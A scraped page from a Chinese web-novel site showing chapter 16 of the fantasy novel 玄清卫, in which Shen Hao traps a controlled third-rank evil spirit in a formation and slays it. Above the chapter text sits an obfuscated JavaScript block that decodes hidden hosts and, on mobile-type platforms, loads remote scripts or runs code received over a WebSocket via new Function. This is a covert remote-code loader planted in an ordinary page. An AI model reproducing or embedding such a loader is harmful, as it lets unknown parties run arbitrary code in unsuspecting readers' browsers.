笔趣阁

字:
关灯 护眼
笔趣阁 > 玄清卫 > 第16章 诱杀
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第16章 诱杀

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
随着沈浩的声音,中庭四周跟着闪出道道身影,呈合围之势将那沉黑的虚影围在里面。
  感受到空气中那道道升腾出来的真气波动,沈浩很满意。周围这十人是陈天问的亲卫,修为和一般校令看齐还擅长合击,是他暗度陈仓临时要来帮衬自己的。如今看来正是派上了用处,也不枉这些人装了这么些天的普通士卒。
  “我知道你就在附近能听到我说的话,你处心积虑就是为了这么一个盒子?我猜猜,这盒子里面应该装的是那些制作完成的阴豆腐吧?啧啧,这么大一箱子怕是数量过百,难怪你愿意几次三番的冒险逗留。不过这次你走不了了。”
  沈浩话音刚落,一道迅雷般的引援符便破空而起,几个呼吸间就能传出数百里。
  这是约定好的讯号,那些被沈浩散出去的玄清卫和卫戍兵丁会在第一时间往回收拢,在五羊城外形成一个铁桶,或者说是瓮中捉鳖。
  眼前这沉黑的虚影不用说正是一头邪祟,还是就像之前那场袭击一样明显是受人控制的。而想要操纵邪祟就不可能离得太远,所以背后的那名邪门修士此时必定就在五羊城中!
  “想跑?晚了!你真以为老子这些天跟个傻子一样胡乱下令吗?都是为了你呀!嘿嘿,果然让我等到你了。对了,这头邪祟也是三品,不知道是那齐闻远的魂魄重炼而成还是齐恒兵的魂魄炼制的?”
  沈浩的言语慢悠悠的,一点不像平时那么干脆,他现在巴不得说慢点,正好给城外的王俭他们争取扎紧口袋的时间。
  “嘶!”
  邪祟不懂人言,但操纵这邪祟的人懂。看到沈浩带人出来的时候就知道中招了,想跑,可地面上突然亮起的阵阵微光告诉他这头邪祟要完。
  “我说了你今天跑不掉的,不单你自己,这头邪祟也跑不掉。认识这些阵法吗?这可是花了大本钱描绘出来的镇邪笼。”
  邪祟可怕就可怕在不可预测性,多半都是遭遇战,凭借玄清卫基层人员的战斗力应付起来真的九死一生。可眼前这种设好套等着对方往里钻的情况就完全不一样了。
  镇邪笼,阵法的一种,布置虽然繁琐可效果强大,对于五品以下的邪祟都有很好的禁锢和削弱效果。
  那十名总旗亲卫就是主持阵法的枢纽,镇邪笼也是他们画的,当然,布阵的材料是陈天问特批的。他们向沈浩保证过会将这头三品邪祟禁锢在阵法当中,并且可以消减对方五成的战斗力。
  “铿锵!”
  沈浩抽出腰间的雁脊刀,刀鞘被他抛开,双手握住刀柄平举,他要亲手宰了这头邪祟!
  脚下生风,雁脊刀上真气流转,经过刀身上的阵法加持形成如刀罡一般的淡金色刀芒,虽未达到脱刀飞出的地步,但却是沈浩想最强的攻击手段了。
  这种刀芒又叫:含芒。
  眨眼间沈浩便和阵中的邪祟战在一起,身形快如魑魅,辗转腾挪间每每挥刀斩出都能在邪祟身上留下一道如同灼烧般的斩痕。
  而反观邪祟,行动完全被阵法牵制,加之巨大的身形根本无法闪避,只能嘶吼咆哮着一点一点被沈浩消磨毫无还手之力。
  “刺啦!”
  一炷香之后。
  刀锋划过,邪祟躯干被一刀斩成两截,生命力再强也是终于扛不住了,身体开始分崩离析,一股股戾气飘散沉入地下。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师